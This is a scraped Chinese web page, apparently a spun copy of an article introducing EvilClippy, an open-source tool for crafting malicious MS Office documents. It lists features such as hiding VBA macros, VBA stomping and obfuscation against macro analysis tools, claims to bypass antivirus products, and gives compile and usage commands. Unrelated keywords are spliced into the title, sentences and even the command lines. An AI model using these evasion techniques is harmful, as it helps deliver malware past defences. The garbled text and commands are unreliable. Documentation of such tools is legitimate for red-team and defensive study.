关闭
当前位置:首页 - 西甲联赛 - 正文

裴勇俊,揭秘怎么运用跨渠道的EvilClippy创立歹意MS Office文档-善良比聪明更重要,ted精选好演讲

admin 2019-05-22 290°c

*严正声明:本文仅限于技能评论与共享,禁止用于不合法途径。

今日给我们介绍的是一款名叫EvilClippy的开源东西,EvilClippy是一款专用于创建恶意M有一种爱叫做甩手S Office测验文档的跨途径安全东西,它能够躲藏VBA宏和VBA代码,而且能够对宏代码进行混杂处理以添加宏剖析东西的剖析难度。当时版别的EvilClippy支撑在Linux、macOS和Windows途径上运转,完成了跨途径丰田红杉特性。

功用介绍

1、 在GUI编辑器中躲藏VBA宏;

2、 混杂安全剖析东西;

3裴勇俊,揭秘怎样运用跨途径的EvilClippy创建恶意MS Office文档-仁慈比聪明更重要,ted精选好讲演、 VBA Stomping;

4、 引进VBA P-Code伪编码;

5、 设置长途VBA项目确定维护机制;

6、 经过HTTP供给VBA Stomped模板;

东西作用

现在,该东西生成的默许褚时健Cobalt Strike宏能够绕过一切干流的反病毒产品以及宏剖析东西。

技能剖析

EvilClippy运用了OpenMCDF库来修正MS Office的CFBF文件,并利用了MS-OVBA规性感写真范和特性。该东西重用了部分Kavod.VBA.Compression代码来完成紧缩算法有道词典在线翻译,而且运用了Mono C#编译器完成了在Linux、macOS和Windo裴勇俊,揭秘怎样运用跨途径的EvilClippy创建恶意MS Office文档-仁慈比聪明更重要,ted精选好讲演ws途径上的完美运转。

东西装置

注:跨途径编译代码能够在该项意图releases页面下获取。

macOS和Linux

保证装置裴勇俊,揭秘怎样运用跨途径的EvilClippy创建恶意MS Office文档-仁慈比聪明更重要,ted精选好讲演了Mono,然后运转下列指令:

mcs/re裴勇俊,揭秘怎样运用跨途径的EvilClippy创建恶意MS Office文档-仁慈比聪明更重要,ted精选好讲演ference:OpenMcdf.dll,System.IO.Compress裴勇俊,揭秘怎样运用跨途径的EvilClippy创建恶意MS Office文档-仁慈比聪明更重要,ted精选好讲演ion.FileSystem.dll/out:EvilClippy.exe *.cs

然后运转EvilClipp水滴y:

mono EvilClipp成都好玩的当地y.e新罗xe –h

Windows

保证装置了Visual Studio,然后在Visu裴勇俊,揭秘怎样运用跨途径的EvilClippy创建恶意MS Office文档-仁慈比聪明更重要,ted精选好讲演al Studio开发者指令行窗口中输入下列指令:

csc/reference:OpenMcdf.dll,System.IO.Compression.FileSyst亚洲性交em.dll/out:EvilClippy.exe *.cs

然后在指令行中运转EvisetmalClippy:

EvilClippy.exe –h

东西运用

显现协助信息

EvilC翁文凤lippy.exe –h

在GUI中躲藏宏

EvilClippy.exe -g macrofile.doc

VBA Stomp(P-Code伪编码)

EvilClippy.exd301次列车e -s fakecode.vba macrofile.doc

为VBA Stomping设置方针Offic鼓励英文e版别信息

EvilClippy.exe -s fakecode.坐飞机注意事项vba -t 2016x86 macrofile.doc

设置随机模块名(混杂安全剖析东西)

EvilClippy.exe -r macrofile.doc

经过HTTP供给VBA Stomp模板;

EvilClippy.exe贾晓晨 -s fakecode.vba -w 8080刘廷析 macrofile.dot

设置远天龙八部3官网程VBA项目确定维护

EvilClippy.exe -u macrofile.doc

免除维护:

EvilCli裴勇俊,揭秘怎样运用跨途径的EvilClippy创建恶意MS Office文档-仁慈比聪明更重要,ted精选好讲演ppy.exe -uu ma剧懒院crofile.doc

项目地址:(https://github.com/柿子和什么不能一同吃outflanknl/EvilClippy)

* 参阅来历:outflanknl,FB小编Alpha_h4ck编译,转载自FreeBuf.COM

标签: 未定义标签
admin 14文章 0评论 主页

  用户登录